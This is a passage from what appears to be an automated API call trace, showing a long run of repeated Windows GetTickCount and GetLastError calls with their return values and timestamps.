GetTickCount () returned 0x203b7 [0105.376] GetLastError () returned 0x0 [0105.376] GetTickCount () returned 0x203b7 [0105.376] GetLastError () returned 0x0 [0105.376] GetTickCount () returned 0x203b7 [0105.376] GetLastError () returned 0x0 [0105.376] GetTickCount () returned 0x203c7 [0105.376] GetLastError () returned 0x0 [0105.376] GetTickCount () returned 0x203c7 [0105.376] GetLastError () returned 0x0 [0105.377] GetTickCount () returned 0x203c7 [0105.377] GetLastError () returned 0x0 [0105.377] GetTickCount () returned 0x203c7 [0105.377] GetLastError () returned 0x0 [0105.377] GetTickCount () returned 0x203c7 [0105.377] GetLastError () returned 0x0 [0105.377] GetTickCount () returned 0x203c7 [0105.377] GetLastError () returned 0x0 [0105.377] GetTickCount () returned 0x203c7 [0105.377] GetLastError () returned 0x0 [0105.377] GetTickCount () returned 0x203c7 [0105.377] GetLastError () returned 0x0 [0105.377] GetTickCount () returned 0x203c7 [0105.378] GetLastError () returned 0x0 [0105.378] GetTickCount () returned 0x203c7 [0105.378] GetLastError () returned 0x0 [0105.378] GetTickCount () returned 0x203c7 [0105.378] GetLastError () returned 0x0 [0105.378] GetTickCount () returned 0x203c7 [0105.378] GetLastError () returned 0x0 [0105.378] GetTickCount () returned 0x203c7 [0105.378] GetLastError () returned 0x0 [0105.378] GetTickCount () returned 0x203c7 [0105.378] GetLastError () returned 0x0 [0105.378] GetTickCount () returned 0x203c7 [0105.379] GetLastError () returned 0x0 [0105.379] GetTickCount () returned 0x203c7 [0105.379] GetLastError () returned 0x0 [0105.379] GetTickCount () returned 0x203c7 [0105.379] GetLastError () returned 0x0 [0105.379] GetTickCount () returned 0x203c7 [0105.379] GetLastError () returned 0x0 [0105.379] GetTickCount () returned 0x203c7 [0105.379] GetLastError () returned 0x0 [0105.379] GetTickCount () returned 0x203c7 [0105.379] GetLastError () returned 0x0 [0105.379] GetTickCount () returned 0x203c7 [0105.379] GetLastError () returned 0x0 [0105.380] GetTickCount () returned 0x203c7 [0105.380] GetLastError () returned 0x0 [0105.380] GetTickCount () returned 0x203c7 [0105.380] GetLastError () returned 0x0 [0105.380] GetTickCount () returned 0x203c7 [0105.380] GetLastError () returned 0x0 [0105.380] GetTickCount () returned 0x203c7 [0105.380] GetLastError () returned 0x0 [0105.380] GetTickCount () returned 0x203c7 [0105.380] GetLastError () returned 0x0 [0105.380] GetTickCount () returned 0x203c7 [0105.380] GetLastError () returned 0x0 [0105.380] GetTickCount () returned 0x203c7 [0105.381] GetLastError () returned 0x0 [0105.381] GetTickCount () returned 0x203c7 [0105.381] GetLastError () returned 0x0 [0105.381] GetTickCount () returned 0x203c7 [0105.381] GetLastError () returned 0x0 [0105.381] GetTickCount () returned 0x203c7 [0105.381] GetLastError () returned 0x0 [0105.381] GetTickCount () returned 0x203c7 [0105.381] GetLastError () returned 0x0 [0105.381] GetTickCount () returned 0x203c7 [0105.381] GetLastError () returned 0x0 [0105.381] GetTickCount () returned 0x203c7 [0105.381] GetLastError () returned 0x0 [0105.382] GetTickCount () returned 0x203c7 [0105.382] GetLastError () returned 0x0 [0105.382] GetTickCount () returned 0x203c7 [0105.382] GetLastError () returned 0x0 [0105.382] GetTickCount () returned 0x203c7 [0105.382] GetLastError () returned 0x0 [0105.382] GetTickCount () returned 0x203c7 [0105.382] GetLastError () returned 0x0 [0105.382] GetTickCount () returned 0x203c7 [0105.382] GetLastError () returned 0x0 [0105.382] GetTickCount () returned 0x203c7 [0105.383] GetLastError () returned 0x0 [0105.383] GetTickCount () returned 0x203c7 [0105.383] GetLastError () returned 0x0 [0105.383] GetTickCount () returned 0x203c7 [0105.383] GetLastError () returned 0x0 [0105.383] GetTickCount () returned 0x203c7 [0105.383] GetLastError () returned 0x0 [0105.383] GetTickCount () returned 0x203c7 [0105.383] GetLastError () returned 0x0 [0105.383] GetTickCount () returned 0x203c7 [0105.383] GetLastError () returned 0x0 [0105.383] GetTickCount () returned 0x203c7 [0105.384] GetLastError () returned 0x0 [0105.384] GetTickCount () returned 0x203c7 [0105.384] GetLastError () returned 0x0 [0105.384] GetTickCount () returned 0x203c7 [0105.384] GetLastError () returned 0x0 [0105.384] GetTickCount () returned 0x203c7 [0105.384] GetLastError () returned 0x0 [0105.384] GetTickCount () returned 0x203c7 [0105.384] GetLastError () returned 0x0 [0105.384] GetTickCount () returned 0x203c7 [0105.384] GetLastError () returned 0x0 [0105.384] GetTickCount () returned 0x203c7 [0105.385] GetLastError () returned 0x0 [0105.385] GetTickCount () returned 0x203c7 [0105.385] GetLastError () returned 0x0 [0105.385] GetTickCount () returned 0x203c7 [0105.385] GetLastError () returned 0x0 [0105.385] GetTickCount () returned 0x203c7 [0105.385] GetLastError () returned 0x0 [0105.385] GetTickCount () returned 0x203c7 [0105.385] GetLastError () returned 0x0 [0105.385] GetTickCount () returned 0x203c7 [0105.385] GetLastError () returned 0x0 [0105.385] GetTickCount () returned 0x203c7 [0105.385] GetLastError () returned 0x0 [0105.385] GetTickCount () returned 0x203c7 [0105.386] GetLastError () returned 0x0 [0105.386] GetTickCount () returned 0x203c7 [0105.386] GetLastError () returned 0x0 [0105.386] GetTickCount () returned 0x203c7 [0105.386] GetLastError () returned 0x0 [0105.386] GetTickCount () returned 0x203c7 [0105.386] GetLastError () returned 0x0 [0105.386] GetTickCount () returned 0x203c7 [0105.386] GetLastError () returned 0x0 [0105.386] GetTickCount () returned 0x203c7 [0105.386] GetLastError () returned 0x0 [0105.386] GetTickCount () returned 0x203c7 [0105.386] GetLastError () returned 0x0 [0105.386] GetTickCount () returned 0x203c7 [0105.387] GetLastError () returned 0x0 [0105.387] GetTickCount () returned 0x203c7 [0105.387] GetLastError () returned 0x0 [0105.387] GetTickCount () returned 0x203c7 [0105.387] GetLastError () returned 0x0 [0105.387] GetTickCount () returned 0x203c7 [0105.387] GetLastError () returned 0x0 [0105.387] GetTickCount () returned 0x203c7 [0105.387] GetLastError () returned 0x0 [0105.387] GetTickCount () returned 0x203c7 [0105.387] GetLastError () returned 0x0 [0105.387] GetTickCount () returned 0x203c7 [0105.387] GetLastError () returned 0x0 [0105.387] GetTickCount () returned 0x203c7 [0105.388] GetLastError () returned 0x0 [0105.388] GetTickCount () returned 0x203c7 [0105.388] GetLastError () returned 0x0 [0105.388] GetTickCount () returned 0x203c7 [0105.388] GetLastError () returned 0x0 [0105.388] GetTickCount () returned 0x203c7 [0105.388] GetLastError () returned 0x0 [0105.388] GetTickCount () returned 0x203c7 [0105.388] GetLastError () returned 0x0 [0105.388] GetTickCount () returned 0x203c7 [0105.388] GetLastError () returned 0x0 [0105.388] GetTickCount () returned 0x203c7 [0105.388] GetLastError () returned 0x0 [0105.388] GetTickCount () returned 0x203c7 [0105.388] GetLastError () returned 0x0 [0105.388] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.389] GetTickCount () returned 0x203c7 [0105.389] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7 [0105.390] GetLastError () returned 0x0 [0105.390] GetTickCount () returned 0x203c7